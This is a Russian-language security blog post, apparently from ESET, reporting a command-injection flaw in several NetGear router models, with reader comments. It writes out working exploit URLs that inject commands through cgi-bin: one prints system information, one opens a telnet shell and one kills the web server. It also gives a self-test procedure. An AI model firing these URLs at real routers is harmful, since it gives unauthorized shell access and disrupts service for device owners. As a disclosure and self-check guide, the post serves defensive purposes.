Роутеры NetGear подвержены серьезной уязвимости

    В некоторых моделях роутеров NetGear была обнаружена серьезная узвимость, которая позволяет злоумышленникам удаленно исполнять команды Linux на устройствах. Для эксплуатации уязвимости злоумышленники могут использовать специальным образом сформированный запрос к роутеру и отправить его через заранее подготовленную веб-страницу.


    NETGEAR has recently become aware of the security issue #582384 that allows unauthenticated web pages to pass form input directly to the command-line interface. A remote attacker can potentially inject arbitrary commands which are then executed by the system.

    Уязвимость достаточно проста в эксплуатации, для этого может использоваться следующая команда.

    http://[router_IP]/cgi-bin/;COMMAND

    Т. е. достаточно указать путь к директории cgi-bin на роутере и поставить после него точку с запятой, а затем указать требуемые для исполнения команды. Например,

    http://[router-address]/cgi-bin/;uname$IFS-a — для вывода информации о роутере
    http://[router-address]/cgi-bin/;telnetd$IFS-p$IFS’56789 — для запуска сервера telnet
    http://[router-address]/cgi-bin/;killall$IFS'httpd' — завершить процесс веб-сервера.

    Следующие модели роутеров NetGear подвержены данной уязвимости.

    NetGear AC1750-Smart WiFi Router (Model R6400)
    NetGear AC1900-Nighthawk Smart WiFi Router (Model R7000)
    NetGear AC2300-Nighthawk Smart WiFi Router with MU-MIMO (Model R7000P)
    NetGear AC2350-Nighthawk X4 AC 2350 Dual Band WiFi Router (Model R7500)
    NetGear AC2600-Nighthawk X4S Smart WiFi Gaming Router (Model R7800)
    NetGear AC3200-Nighthawk AC3200 Tri-Band WiFi Router (Model R8000)
    NetGear AC5300-AC5300 Nighthawk X8 Tri-Band WiFi Router (Model R8500)
    NetGear AD7200-Nighthawk X10 Smart WiFi Router (R9000)

    Для проверки уязвимости роутера можно воспользоваться следующими инструкциями (Windows).

    1. Наберите в веб-браузере http://[router_IP]/cgi-bin/;telnetd$IFS-p$IFS’56789′, подставив вместо router_IP IP-адрес роутера.
    2. Запустите командную строку (Win+R > cmd).
    3. Наберите в командной строке следующую команду telnet [router_IP] 56789, подставив вместо router_IP IP-адрес роутера.
    4. В случае уязвимости роутера, т. е. в том случае, если первая команда была успешно выполнена на нем, вы получите приветственный экран командной оболочки роутера. В том случае, если будет показано сообщение об ошибке, прошивка роутера не является уязвимой.
    5. В случае успешного выполнения первой команды, процесс сервера нужно завершить. Для этого следует вывести список всех процессов и выбрать из него нужный командой ps | grep telnet.
    6. Затем нужно выполнить команду kill <process_id>, при этом заменив process_id на идентификатор процесса telnet, который был получен после выполнения предыдущей команды.

    Пользователям уязвимых версий роутеров следует дождаться выпуска соответствующего исправления и установить его.

    image
    be secure.
    Метки:
    • +13
    • 6,7k
    • 4
    ESET NOD32 76,46
    Компания
    Поделиться публикацией
    Похожие публикации
    Комментарии 4
    • –1
      исправление поможет до первой перезагрузки
      • 0
        В статье про исправление ничего нет, только про заметание следов теста.
      • 0
        Для проверки уязвимости роутера можно воспользоваться следующими инструкциями (Windows).

        А не проще выполнить: http://[router-address]/cgi-bin/;uname$IFS-a

        Беда печаль… 5 штук уязвимы и находятся далеко…
        • 0
          а если установлена кастомная прошивка?

          Только полноправные пользователи могут оставлять комментарии. Войдите, пожалуйста.

          Самое читаемое